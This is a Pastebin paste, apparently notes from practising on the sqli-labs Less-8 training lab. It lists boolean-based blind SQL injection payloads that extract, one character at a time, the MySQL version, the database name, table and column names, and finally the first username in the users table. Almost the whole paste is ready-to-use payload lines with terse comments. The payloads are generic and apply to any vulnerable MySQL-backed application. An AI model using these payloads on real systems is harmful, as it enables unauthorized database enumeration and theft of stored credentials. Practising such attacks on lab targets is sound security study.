API tools faq
paste
Advertisement
Ng4P4L

BlindBase

Ng4P4L
Sep 6th, 2021
45
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.87 KB | None | 0 0
raw download clone embed print report diff
  1. 1' AND 1=1--+ == True
  2. 1' AND 1=0--+ == False
  3.  
  4. for version check
  5. 1' AND (ascii(substr((select version()),1,1))) = 53 --+ // 53 = 5
  6.  
  7. for database lenght check
  8. 1' AND (ascii(substr((select length(database())),1,1))) = 56--+ //56 = 8
  9.  
  10. for database check
  11. 1' AND (ascii(substr((select database()),1,1))) = 115 --+ //115 = s
  12. 1' AND (ascii(substr((select database()),2,1))) = 101 --+ //101 = e
  13. 1' AND (ascii(substr((select database()),3,1))) = 99 --+ //99 = c
  14. 1' AND (ascii(substr((select database()),4,1))) = 117--+ // u
  15. 1' AND (ascii(substr((select database()),5,1))) = 114--+ // r
  16. 1' AND (ascii(substr((select database()),6,1))) = 105--+ // i
  17. 1' AND (ascii(substr((select database()),7,1))) = 116--+ // t
  18. 1' AND (ascii(substr((select database()),8,1))) = 121 --+ //121 = y
  19.  
  20. for all table count
  21.  
  22. http://localhost/sqli-labs-master/Less-8/?id=1' AND (ascii(substr((select count(*) from information_schema.tables where table_schema=database() limit 0,1),1,1))) = 52 --+ // 52 = 4
  23.  
  24. Table length check
  25. 1' AND (ascii(substr((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))) = 54 --+ // 54 = 6
  26.  
  27. for table first columns
  28. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))) = 101 --+ // e
  29. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))) = 109 --+ // m
  30. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))) = 97 --+ // a
  31. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))) = 105 --+ // i
  32. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))) = 108 --+ // l
  33. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))) = 115 --+ // s
  34.  
  35. for table second columns
  36. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))) = 114 --+
  37.  
  38. for table third columns
  39. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 2,1),1,1))) = 117 --+
  40.  
  41. for table fourth columns length
  42. 1' AND (ascii(substr((select length(table_name) from information_schema.tables where table_schema=database() limit 3,1),1,1))) = 53 --+ // 5
  43.  
  44. for table foruth columns
  45. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))) = 117 --+ // u
  46. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),2,1))) = 115 --+ // s
  47. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),3,1))) = 101 --+ // e
  48. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),4,1))) = 114 --+ // r
  49. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),5,1))) = 115 --+ // s
  50.  
  51.  
  52.  
  53. Next Column
  54.  
  55. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),1,1))) = 117 --+ //u
  56. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),2,1))) = 115 --+ //s
  57. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),3,1))) = 101 --+ //e
  58. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),4,1))) = 114 --+ //r
  59. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),5,1))) = 95 --+ //_
  60.  
  61. Or
  62.  
  63. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),1,1))) = 117 --+ //u
  64. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),2,1))) = 115 --+ //s
  65. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),3,1))) = 101 --+ //e
  66. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),4,1))) = 114 --+ //r
  67.  
  68.  
  69. Dump
  70. 1' AND (ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1))) = 68 --+ //D
  71. 1' AND (ascii(substr((SELECT username FROM security.users LIMIT 0,1),2,1))) = 117--+ //u
  72. 1' AND (ascii(substr((SELECT username FROM security.users LIMIT 0,1),3,1))) = 109 --+//m
  73. 1' AND (ascii(substr((SELECT username FROM security.users LIMIT 0,1),4,1))) = 98 --+ //b
  74.  
  75.  
  76.  
  77.  
  78.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!